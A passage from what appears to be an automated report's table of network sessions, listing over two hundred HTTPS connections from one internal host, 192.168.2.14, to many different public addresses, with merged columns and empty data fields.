                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16988192.168.2.144302491.91.161.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16989192.168.2.143693483.115.54.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16990192.168.2.1449204144.91.184.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16991192.168.2.1459616155.37.14.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16992192.168.2.145798241.105.63.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16993192.168.2.1448096111.169.157.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16994192.168.2.145866042.94.110.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16995192.168.2.146056436.13.213.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16996192.168.2.1450078173.158.68.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16997192.168.2.1458008217.28.199.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16998192.168.2.1455494107.138.89.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16999192.168.2.143774473.200.220.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17000192.168.2.143558277.175.17.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17001192.168.2.1435914197.81.163.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17002192.168.2.1440060172.223.138.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17003192.168.2.1453396131.147.47.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17004192.168.2.1456400153.115.234.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17005192.168.2.1449422120.105.114.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17006192.168.2.145845024.15.170.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17007192.168.2.1459060104.121.208.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17008192.168.2.1438306158.93.159.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17009192.168.2.14552548.48.200.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17010192.168.2.1435460166.125.39.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17011192.168.2.144244812.124.97.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17012192.168.2.144967052.8.105.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17013192.168.2.14545069.33.229.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17014192.168.2.146032440.168.66.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17015192.168.2.1440392132.91.114.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17016192.168.2.1436908181.109.46.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17017192.168.2.1441064102.98.87.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17018192.168.2.1454438143.178.130.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17019192.168.2.1455614212.15.126.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17020192.168.2.144730244.213.206.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17021192.168.2.1445320110.205.250.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17022192.168.2.144903074.38.157.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17023192.168.2.144234698.7.87.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17024192.168.2.1458292120.230.237.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17025192.168.2.1450342112.222.173.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17026192.168.2.1451460162.246.236.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17027192.168.2.143829618.12.27.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17028192.168.2.1439696130.81.219.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17029192.168.2.1443444149.110.113.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17030192.168.2.1457164126.178.90.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17031192.168.2.1446574125.135.247.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17032192.168.2.144609243.38.33.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17033192.168.2.1445730135.213.15.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17034192.168.2.143695474.249.213.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17035192.168.2.1449010217.35.50.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17036192.168.2.145966614.148.219.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17037192.168.2.1439678132.200.186.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17038192.168.2.1445634212.83.180.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17039192.168.2.1436522124.156.59.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17040192.168.2.1434618108.162.137.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17041192.168.2.146050436.77.227.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17042192.168.2.144783064.254.164.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17043192.168.2.1449570220.253.206.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17044192.168.2.1438086199.182.17.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17045192.168.2.1436750160.188.132.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17046192.168.2.145264037.60.123.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17047192.168.2.1460754116.14.140.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17048192.168.2.1447514154.118.128.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17049192.168.2.1442634192.36.53.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17050192.168.2.143456468.112.92.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17051192.168.2.144147094.150.93.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17052192.168.2.1448716186.198.83.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17053192.168.2.1452970211.72.242.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17054192.168.2.145473848.64.195.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17055192.168.2.143792818.188.36.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17056192.168.2.143989652.185.83.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17057192.168.2.1444450119.98.213.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17058192.168.2.145863432.50.224.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17059192.168.2.1450310142.118.37.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17060192.168.2.143655642.73.77.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17061192.168.2.144476424.58.159.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17062192.168.2.1451976190.95.156.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17063192.168.2.145029261.119.216.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17064192.168.2.1449946198.82.70.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17065192.168.2.14416221.165.10.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17066192.168.2.144791035.148.122.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17067192.168.2.1434750220.244.12.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17068192.168.2.1456494150.157.1.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17069192.168.2.1448188218.21.220.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17070192.168.2.144652819.88.109.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17071192.168.2.145439276.60.23.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17072192.168.2.1434990207.82.23.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17073192.168.2.145073861.55.119.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17074192.168.2.143619863.93.0.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17075192.168.2.1441582112.157.215.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17076192.168.2.1455002186.229.28.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17077192.168.2.144102094.211.41.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17078192.168.2.144979271.54.112.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17079192.168.2.1443848118.171.91.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17080192.168.2.1457210178.29.124.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17081192.168.2.144349665.179.119.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17082192.168.2.1441098132.112.176.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17083192.168.2.1437412177.144.83.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17084192.168.2.146063217.18.155.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17085192.168.2.1452240167.48.153.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17086192.168.2.1460954199.230.44.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17087192.168.2.143288838.213.108.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17088192.168.2.1438400115.23.150.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17089192.168.2.1446458102.0.86.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17090192.168.2.143870025.102.98.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17091192.168.2.1442604103.151.170.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17092192.168.2.1433948133.255.86.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17093192.168.2.145623472.230.98.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17094192.168.2.1439392157.20.26.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17095192.168.2.14546942.189.239.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17096192.168.2.1438774159.19.149.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17097192.168.2.144476012.71.215.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17098192.168.2.1436754153.153.103.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17099192.168.2.14354422.30.105.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17100192.168.2.1453746219.48.40.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17101192.168.2.143573625.143.204.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17102192.168.2.145955418.48.46.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17103192.168.2.1445546206.213.197.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17104192.168.2.144350844.148.21.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17105192.168.2.1446324157.138.130.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17106192.168.2.1433608136.169.113.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17107192.168.2.1458856107.11.100.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17108192.168.2.1446946184.201.173.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17109192.168.2.145095835.84.64.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17110192.168.2.145021450.76.20.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17111192.168.2.1453444109.184.131.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17112192.168.2.1449164158.145.9.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17113192.168.2.1437730121.218.15.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17114192.168.2.1443284217.84.16.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17115192.168.2.1441660101.228.229.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17116192.168.2.145250275.17.69.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17117192.168.2.1442504182.82.139.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17118192.168.2.1456394202.64.104.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17119192.168.2.143315845.9.152.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17120192.168.2.1445272205.6.249.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17121192.168.2.143565643.19.53.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17122192.168.2.1454940211.113.62.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17123192.168.2.143812848.220.77.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17124192.168.2.144589864.51.64.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17125192.168.2.1460850146.77.223.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17126192.168.2.1440270154.126.121.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17127192.168.2.1443850206.168.82.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17128192.168.2.144846092.238.47.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17129192.168.2.1442274140.205.36.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17130192.168.2.143416657.160.152.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17131192.168.2.143358696.0.196.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17132192.168.2.1440358182.176.241.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17133192.168.2.1458998103.97.235.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17134192.168.2.1459204161.233.152.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17135192.168.2.144427460.106.53.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17136192.168.2.1456796161.239.26.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17137192.168.2.143484224.68.52.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17138192.168.2.1448064116.120.107.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17139192.168.2.1438642201.178.93.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17140192.168.2.1448448199.15.75.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17141192.168.2.145620653.0.102.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17142192.168.2.143962077.142.143.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17143192.168.2.1438092210.127.170.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17144192.168.2.144730039.52.34.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17145192.168.2.1435168116.24.231.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17146192.168.2.1438844195.54.27.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17147192.168.2.1449820176.100.86.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17148192.168.2.1460048149.172.116.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17149192.168.2.145663445.181.97.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17150192.168.2.1439556121.145.156.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17151192.168.2.1446682128.238.120.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17152192.168.2.144870689.44.166.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17153192.168.2.1449252212.136.23.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17154192.168.2.145806442.235.212.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17155192.168.2.144183688.238.152.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17156192.168.2.1443286117.126.105.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17157192.168.2.1452718133.241.11.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17158192.168.2.1448766137.101.14.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17159192.168.2.1452692181.105.131.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17160192.168.2.143446866.121.2.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17161192.168.2.1438324100.20.155.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17162192.168.2.143875495.150.171.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17163192.168.2.1447092158.104.44.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17164192.168.2.1450262117.55.221.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17165192.168.2.145165478.191.112.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17166192.168.2.144619023.91.26.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17167192.168.2.1456164141.14.185.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17168192.168.2.1435644177.139.148.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17169192.168.2.145344663.140.185.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17170192.168.2.145106025.78.34.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17171192.168.2.1437952137.161.148.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17172192.168.2.1450856134.219.188.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17173192.168.2.144703019.207.37.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17174192.168.2.1438380131.163.29.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17175192.168.2.145053827.190.185.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17176192.168.2.1443264140.183.45.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17177192.168.2.145317080.20.170.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17178192.168.2.1438254108.130.7.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17179192.168.2.143621652.186.27.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17180192.168.2.1440528211.214.117.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17181192.168.2.14414782.102.238.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17182192.168.2.1440444161.70.73.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17183192.168.2.1439994138.118.18.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17184192.168.2.1458874107.13.185.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17185192.168.2.1448656220.212.200.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17186192.168.2.145711250.216.52.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17187192.168.2.14424542.150.173.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17188192.168.2.144153473.49.205.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17189192.168.2.1437144158.230.57.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17190192.168.2.145623613.100.13.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17191192.168.2.1438090206.158.179.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17192192.168.2.1455270183.137.141.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17193192.168.2.1446980217.169.105.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17194192.168.2.1451236170.227.135.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17195192.168.2.1440454152.56.84.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17196192.168.2.1436896108.149.45.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17197192.168.2.1438462202.122.5.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17198192.168.2.1451744140.239.65.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17199192.168.2.145944677.168.35.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17200192.168.2.1458404123.83.78.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17201192.168.2.1446592134.245.45.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17202192.168.2.144992225.186.171.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17203192.168.2.1454400202.60.225.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17204192.168.2.1457272125.20.163.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17205192.168.2.1434580111.84.216.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17206192.168.2.1448226220.252.131.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17207192.168.2.144612875.117.124.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17208192.168.2.1434524165.209.170.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17209192.168.2.1453476189.152.77.124443
